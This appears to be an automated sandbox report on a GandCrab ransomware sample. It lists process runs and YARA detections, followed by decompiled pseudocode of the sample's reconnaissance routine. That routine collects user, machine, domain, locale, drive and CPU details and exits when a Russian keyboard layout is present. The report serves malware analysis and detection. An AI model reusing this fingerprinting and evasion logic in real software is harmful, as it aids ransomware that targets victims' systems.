Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Imagebase:	0xf580000
File size:	71680 bytes
MD5 hash:	937D3395BC50812DBAB14034E2FCC25B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001B.00000002.543716929.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001B.00000000.518024199.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000001B.00000003.542421272.0000000003490000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000001B.00000002.543807830.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mqsmvj.exePID: 5636, Parent PID: 3320

General

Target ID:	28
Start time:	23:54:10
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Imagebase:	0xf580000
File size:	71680 bytes
MD5 hash:	937D3395BC50812DBAB14034E2FCC25B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001C.00000000.542136140.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000001C.00000002.559901286.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001C.00000002.559852565.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000001C.00000003.557904847.0000000003130000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mqsmvj.exePID: 2564, Parent PID: 3320

General

Target ID:	30
Start time:	23:54:21
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Imagebase:	0xf580000
File size:	71680 bytes
MD5 hash:	937D3395BC50812DBAB14034E2FCC25B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000001E.00000002.598229388.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001E.00000002.598200905.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001E.00000000.560904578.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000001E.00000003.596521661.0000000003470000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mqsmvj.exePID: 4956, Parent PID: 3320

General

Target ID:	34
Start time:	23:54:30
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Imagebase:	0xf580000
File size:	71680 bytes
MD5 hash:	937D3395BC50812DBAB14034E2FCC25B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000022.00000000.583307214.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000022.00000002.593533053.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mqsmvj.exePID: 4480, Parent PID: 3320

General

Target ID:	35
Start time:	23:54:43
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Imagebase:	0x7ff72dbc0000
File size:	71680 bytes
MD5 hash:	937D3395BC50812DBAB14034E2FCC25B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000023.00000000.607979017.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000023.00000002.638125851.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000023.00000002.638106882.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000023.00000003.636841128.0000000003970000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mqsmvj.exePID: 5768, Parent PID: 3320

General

Target ID:	36
Start time:	23:54:52
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Imagebase:	0xf580000
File size:	71680 bytes
MD5 hash:	937D3395BC50812DBAB14034E2FCC25B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000024.00000002.634796069.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000024.00000000.631210947.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mqsmvj.exePID: 6000, Parent PID: 3320

General

Target ID:	37
Start time:	23:55:02
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Imagebase:	0xf580000
File size:	71680 bytes
MD5 hash:	937D3395BC50812DBAB14034E2FCC25B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000025.00000002.681141144.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000025.00000000.650224978.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000025.00000003.678519196.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000025.00000002.681251272.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mqsmvj.exePID: 916, Parent PID: 3320

General

Target ID:	38
Start time:	23:55:12
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Imagebase:	0xf580000
File size:	71680 bytes
MD5 hash:	937D3395BC50812DBAB14034E2FCC25B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000026.00000002.678365276.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000026.00000000.674598119.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: mqsmvj.exePID: 3780, Parent PID: 3320

General

Target ID:	39
Start time:	23:55:23
Start date:	31/08/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe"
Imagebase:	0xf580000
File size:	71680 bytes
MD5 hash:	937D3395BC50812DBAB14034E2FCC25B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000027.00000000.693057490.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000027.00000002.720286366.000000000F592000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000027.00000002.720225413.000000000F58A000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000027.00000003.716539661.0000000002FB0000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: IJr8RvvhZ3.exePID: 732, Parent PID: 5500COMMON

Execution Graph

Execution Coverage:	22.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	45.5%
Total number of Nodes:	714
Total number of Limit Nodes:	15

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0F147490 Relevance: 144.0, APIs: 55, Strings: 27, Instructions: 499
memorystringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E0F147490(DWORD* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				long _v16;
				long _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				short _v36;
				short _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				signed short _v76;
				char _v132;
				void* _t154;
				long _t155;
				WCHAR* _t157;
				short _t158;
				short _t159;
				short _t160;
				signed int _t161;
				signed int _t164;
				signed int _t166;
				int _t178;
				void* _t181;
				signed int _t183;
				signed int _t186;
				WCHAR* _t190;
				void* _t191;
				void* _t199;
				_Unknown_base(*)()* _t204;
				signed int _t211;
				intOrPtr _t216;
				WCHAR* _t218;
				WCHAR* _t220;
				void* _t221;
				void* _t224;
				WCHAR* _t226;
				long _t229;
				int _t230;
				long _t234;
				void* _t238;
				long _t240;
				long _t243;
				WCHAR* _t246;
				void* _t247;
				WCHAR* _t249;
				WCHAR* _t250;
				WCHAR* _t252;
				void* _t256;
				DWORD* _t260;
				short* _t261;
				DWORD* _t266;
				void* _t267;
				signed int _t270;
				void* _t274;
				void* _t276;
				void* _t277;
				DWORD* _t279;
				void* _t280;
				void* _t281;

				_t267 = __edx;
				_t260 = __ecx;
				_t279 = __ecx;
				if( *__ecx != 0) {
					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 8) = _t252;
					_v24 = 0x100;
					GetUserNameW(_t252, _t260); // executed
				}
				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
					_v24 = 0x1e;
					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4); // executed
					_t260 =  &_v24;
					 *(_t279 + 0x14) = _t250;
					GetComputerNameW(_t250, _t260);
				}
				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
					L11:
					if( *(_t279 + 0x30) == 0) {
						L18:
						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
							L31:
							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4); // executed
								_push(_t260);
								 *(_t279 + 0x50) = _t220;
								_t221 = E0F147410(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80); // executed
								if(_t221 == 0) {
									_push(_t260);
									E0F147410(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
									wsprintfW( *(_t279 + 0x50), L"error");
									_t281 = _t281 + 8;
								}
							}
							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
								L44:
								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
									_v28 = 0;
									_t216 = E0F147B70(_t279 + 0x2c,  &_v28); // executed
									if(_t216 == 0) {
										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
									}
								}
								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x68) = _t190;
									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
									_t276 = _t191;
									GetWindowsDirectoryW(_t276, 0x100);
									_t66 = _t276 + 0x600; // 0x600
									_t266 = _t66;
									 *((short*)(_t276 + 6)) = 0;
									_t68 = _t276 + 0x400; // 0x400
									_t69 = _t276 + 0x604; // 0x604
									_t70 = _t276 + 0x608; // 0x608
									_t71 = _t276 + 0x200; // 0x200
									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
									_push(_t266);
									_t72 = _t276 + 0x60c; // 0x60c
									_t260 = _t72;
									_t199 = E0F147410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
									if(_t199 != 0) {
										_t73 = _t276 + 0x60c; // 0x60c
										_t211 = lstrlenW(_t73);
										_t74 = _t276 + 0x60c; // 0x60c
										_t260 = _t74;
										_push(_t260);
										E0F147410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
									}
									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
									_t79 = _t276 + 0x60c; // 0x60c
									_t281 = _t281 + 0xc;
									lstrcatW( *(_t279 + 0x68), _t79);
									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
									_v28 = _t204;
									if(_t204 == 0) {
										 *(_t279 + 0x6c) = 0;
									} else {
										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
									}
									 *(_t279 + 0x70) =  *(_t276 + 0x600);
									VirtualFree(_t276, 0, 0x8000); // executed
								}
								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
									L67:
									if( *(_t279 + 0x80) == 0) {
										L72:
										return 1;
									}
									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
									 *(_t279 + 0x84) = _t154;
									if(_t154 == 0) {
										L71:
										 *(_t279 + 0x80) = 0;
										goto L72;
									}
									_push(_t260);
									_t155 = E0F146FF0(_t154); // executed
									if(_t155 != 0) {
										goto L72;
									}
									VirtualFree( *(_t279 + 0x84), _t155, 0x8000); // executed
									goto L71;
								} else {
									_v68 = L"UNKNOWN";
									_v64 = L"NO_ROOT_DIR";
									_v60 = L"REMOVABLE";
									_v56 = L"FIXED";
									_v52 = L"REMOTE";
									_v48 = L"CDROM";
									_v44 = L"RAMDISK";
									_t157 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x7c) = _t157;
									_t261 =  &_v132;
									_t158 = 0x41;
									do {
										 *_t261 = _t158;
										_t261 = _t261 + 2;
										_t158 = _t158 + 1;
									} while (_t158 <= 0x5a);
									_t159 =  *L"?:\\"; // 0x3a003f
									_v40 = _t159;
									_t160 =  *0xf14f350; // 0x5c
									_v36 = _t160;
									_t161 = 0;
									_v24 = 0;
									do {
										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
										_t164 = GetDriveTypeW( &_v40); // executed
										_t270 = _t164;
										if(_t270 > 2 && _t270 != 5) {
											_v36 = 0;
											lstrcatW( *(_t279 + 0x7c),  &_v40);
											_v36 = 0x5c;
											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
											lstrcatW( *(_t279 + 0x7c), "_");
											_t178 = GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16); // executed
											if(_t178 == 0) {
												lstrcatW( *(_t279 + 0x7c), L"0,");
												goto L64;
											}
											_v8 = E0F148AB0(_v16, 0, _v28 * _v20, 0);
											_t256 = _t267;
											_t181 = E0F148AB0(_v12, 0, _v28 * _v20, 0);
											_t274 = _v8;
											_v32 = _t274 - _t181;
											asm("sbb eax, edx");
											_v8 = _t256;
											_t183 = lstrlenW( *(_t279 + 0x7c));
											_push(_t256);
											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
											_t186 = lstrlenW( *(_t279 + 0x7c));
											_push(_v8);
											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
											_t281 = _t281 + 0x20;
											lstrcatW( *(_t279 + 0x7c), ",");
										}
										_t161 = _v24 + 1;
										_v24 = _t161;
									} while (_t161 < 0x1b);
									_t166 = lstrlenW( *(_t279 + 0x7c));
									_t260 =  *(_t279 + 0x7c);
									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
									goto L67;
								}
							} else {
								__imp__GetNativeSystemInfo( &_v76); // executed
								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4); // executed
								_t260 = _v76 & 0x0000ffff;
								 *(_t279 + 0x5c) = _t218;
								if(_t260 > 9) {
									L42:
									_push(L"Unknown");
									L43:
									wsprintfW(_t218, ??);
									_t281 = _t281 + 8;
									goto L44;
								}
								_t260 =  *(_t260 + E0F147B60) & 0x000000ff;
								switch( *((intOrPtr*)(_t260 * 4 +  &M0F147B4C))) {
									case 0:
										_push(L"x86");
										goto L43;
									case 1:
										_push(L"ARM");
										goto L43;
									case 2:
										_push(L"Itanium");
										goto L43;
									case 3:
										_push(L"x64");
										goto L43;
									case 4:
										goto L42;
								}
							}
						}
						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4); // executed
						_v8 = _t224;
						_v20 = _t224 + 0xe;
						_t226 = VirtualAlloc(0, 4, 0x3000, 4); // executed
						 *(_t279 + 0x44) = _t226;
						_t277 = 1;
						_v24 = 1;
						do {
							wsprintfW(_v8, L"%d", _t277);
							_t281 = _t281 + 0xc;
							_v16 = 0;
							_t277 = _t277 + 1;
							_t229 = RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12); // executed
							if(_t229 != 0) {
								L27:
								_t230 = 0;
								_v24 = 0;
								goto L28;
							}
							_v28 = 0x80;
							_t234 = RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28); // executed
							if(_t234 != 0) {
								GetLastError();
							} else {
								_v16 = 1;
							}
							RegCloseKey(_v12); // executed
							if(_v16 == 0) {
								goto L27;
							} else {
								if(lstrcmpiW(_v20, L"00000419") == 0) {
									_t218 = wsprintfW( *(_t279 + 0x44), "1");
									_t281 = _t281 + 8;
									ExitProcess(0);
								}
								_t230 = _v24;
							}
							L28:
						} while (_t277 != 9 && _t230 != 0);
						wsprintfW( *(_t279 + 0x44), "0");
						_t281 = _t281 + 8;
						VirtualFree(_v8, 0, 0x8000); // executed
						goto L31;
					}
					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					_v20 = _t238;
					 *(_t279 + 0x38) = _t238;
					_v12 = 0;
					_t240 = RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8); // executed
					if(_t240 != 0) {
						L17:
						 *(_t279 + 0x30) = 0;
						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
						goto L18;
					}
					_v24 = 0x40;
					_t243 = RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24); // executed
					if(_t243 != 0) {
						GetLastError();
					} else {
						_v12 = 1;
					}
					RegCloseKey(_v8); // executed
					if(_v12 != 0) {
						goto L18;
					} else {
						goto L17;
					}
				} else {
					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					 *(_t279 + 0x20) = _t246;
					if(_t246 == 0) {
						goto L11;
					}
					_push(_t260);
					_t247 = E0F147410(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
					if(_t247 == 0) {
						wsprintfW( *(_t279 + 0x20), L"undefined");
						L10:
						_t281 = _t281 + 8;
						goto L11;
					}
					_t249 =  *(_t279 + 0x20);
					if( *_t249 != 0) {
						goto L11;
					}
					wsprintfW(_t249, L"WORKGROUP");
					goto L10;
				}
			}

0x0f147490
0x0f147490
0x0f14749b
0x0f1474a7
0x0f1474b7
0x0f1474b9
0x0f1474bc
0x0f1474c1
0x0f1474c8
0x0f1474c8
0x0f1474d2
0x0f1474df
0x0f1474e6
0x0f1474e8
0x0f1474eb
0x0f1474f0
0x0f1474f0
0x0f147500
0x0f147556
0x0f14755a
0x0f1475f5
0x0f1475f9
0x0f1476f9
0x0f1476fd
0x0f14770d
0x0f14770f
0x0f147725
0x0f147728
0x0f14772f
0x0f147731
0x0f147749
0x0f147756
0x0f147758
0x0f147758
0x0f14772f
0x0f14775f
0x0f1477ce
0x0f1477d2
0x0f1477d7
0x0f1477e3
0x0f1477ea
0x0f1477ec
0x0f1477ec
0x0f1477ea
0x0f1477f3
0x0f147807
0x0f147817
0x0f14781a
0x0f14781c
0x0f147824
0x0f14782c
0x0f14782c
0x0f147837
0x0f14783b
0x0f147842
0x0f147849
0x0f147856
0x0f14785e
0x0f147864
0x0f14786a
0x0f14786a
0x0f147880
0x0f147887
0x0f147889
0x0f147890
0x0f147896
0x0f147896
0x0f14789c
0x0f1478b5
0x0f1478b5
0x0f1478c8
0x0f1478d0
0x0f1478d6
0x0f1478dd
0x0f1478f0
0x0f1478f6
0x0f1478fb
0x0f147919
0x0f1478fd
0x0f147914
0x0f147914
0x0f14792e
0x0f147931
0x0f147931
0x0f147943
0x0f147af2
0x0f147af9
0x0f147b42
0x0f147b4b
0x0f147b4b
0x0f147b09
0x0f147b0f
0x0f147b17
0x0f147b36
0x0f147b36
0x00000000
0x0f147b36
0x0f147b19
0x0f147b1b
0x0f147b22
0x00000000
0x00000000
0x0f147b30
0x00000000
0x0f147949
0x0f147957
0x0f14795e
0x0f147965
0x0f14796c
0x0f147973
0x0f14797a
0x0f147981
0x0f147988
0x0f14798e
0x0f147991
0x0f147994
0x0f1479a0
0x0f1479a0
0x0f1479a3
0x0f1479a6
0x0f1479a7
0x0f1479ad
0x0f1479b2
0x0f1479b5
0x0f1479ba
0x0f1479bd
0x0f1479bf
0x0f1479c2
0x0f1479c7
0x0f1479cf
0x0f1479d5
0x0f1479da
0x0f1479eb
0x0f1479f6
0x0f147a04
0x0f147a08
0x0f147a12
0x0f147a28
0x0f147a30
